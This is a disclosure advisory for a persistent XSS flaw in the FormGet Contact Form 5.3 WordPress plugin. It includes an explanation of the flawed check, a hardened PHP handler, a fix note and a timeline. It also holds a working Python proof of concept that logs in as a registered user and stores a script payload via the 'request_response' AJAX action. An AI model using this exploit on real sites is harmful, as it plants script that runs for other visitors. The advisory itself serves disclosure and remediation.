FormGet Contact Form 5.3, Persistent XSS
The AJAX action ‘request_response’, defined in formget-contact-form/index.php at line 278, is available to any logged-in user. The ‘value’ parameter is accepted as valid so long as the string ‘sideBar’ is found at a position other than 0 (i.e. prefix the payload with a space). The ‘page_id[]’ parameter can be supplied to specify which pages the stored HTML/JS is rendered on.
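The check described above is the classic PHP pattern of using a substring position as a boolean: a match at offset 0 is falsy and is rejected, while a match at any later offset is truthy and is accepted, so the marker string no longer constrains the rest of the value. The following is an added illustration, not code from the plugin or from this advisory: the weak pattern as the text describes it next to a hardened handler. The function names, option key, nonce action and the allow-list of positions are assumptions; the WordPress API calls are real.

```php
<?php
// Added illustration (not the plugin's code) of the validation pattern the
// advisory describes and of a hardened equivalent. Function names, the option
// key and the allow-list are assumptions.

// Weak pattern: strpos() returns 0 for a match at the start (falsy) and an
// integer > 0 for a match anywhere later (truthy). "sideBar" is rejected,
// " sideBar<script>...</script>" is accepted, and the rest of the string is
// never constrained, so arbitrary markup reaches storage.
function weak_is_valid_value($value) {
    return (bool) strpos($value, 'sideBar');
}

// Hardened handler for a WordPress AJAX action that stores a display position.
function hardened_request_response() {
    // 1. Capability check: a plain registered user must not be able to change
    //    what is rendered to other visitors.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }

    // 2. Nonce check so a logged-in administrator cannot be CSRF'd into the action.
    check_ajax_referer('formget_request_response', 'nonce'); // assumed nonce action name

    // 3. Exact allow-list with strict comparison; never treat a substring
    //    position as a boolean.
    $allowed = array('sideBar', 'footer'); // assumed set of display positions
    $value   = isset($_POST['value']) ? wp_unslash($_POST['value']) : '';
    if (!in_array($value, $allowed, true)) {
        wp_send_json_error('invalid value', 400);
    }

    // 4. Page ids are positive integers; anything else is discarded.
    $page_ids = isset($_POST['page_id']) ? (array) $_POST['page_id'] : array();
    $page_ids = array_map('intval', $page_ids);
    $page_ids = array_values(array_filter($page_ids, function ($id) {
        return $id > 0;
    }));

    update_option('formget_display', array( // assumed option key
        'position' => $value,
        'pages'    => $page_ids,
    ));
    wp_send_json_success();
}

// 5. Wherever the stored value is later printed, escape it for its output
//    context; validation on input is not a substitute for this.
function render_stored_position() {
    $opt = get_option('formget_display', array('position' => ''));
    echo esc_html($opt['position']);
}
```

The two changes that close the issue are the strict allow-list comparison (step 3) and output escaping (step 5); the capability and nonce checks (steps 1 and 2) reduce who can reach the handler at all, which matters because the advisory's "Authorization Required" is only a registered account.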
Homepage
https://wordpress.org/plugins/formget-contact-form/
CVSS Score
4
CVSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 5.3.1.
Proof of Concept
import requests

# Log in as any registered user; the AJAX action performs no capability check.
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Call the 'request_response' action. 'value' only has to contain 'sideBar' at a
# non-zero position, hence the leading space; 'page_id[]' selects the pages on
# which the stored value is rendered.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "request_response",
    "value": " sideBar<script>alert(1)</script>",
    "page_id[]": list(range(0, 100))  # list() so this behaves the same on Python 2 and 3
}
r = s.post(url, data=payload)
Timeline
- 2015-02-27: Discovered
- 2015-02-27: Vendor notified
- 2015-02-27: Vendor responded
- 2015-02-28: Version 5.3.1 released – issue still present
- 2015-02-28: Issue resolved in Git repo – enquired about bumping version number
- 2015-02-28: Re-checked version 5.3.1 – issue resolved, but version number not bumped.
- 2015-03-07: Advisory released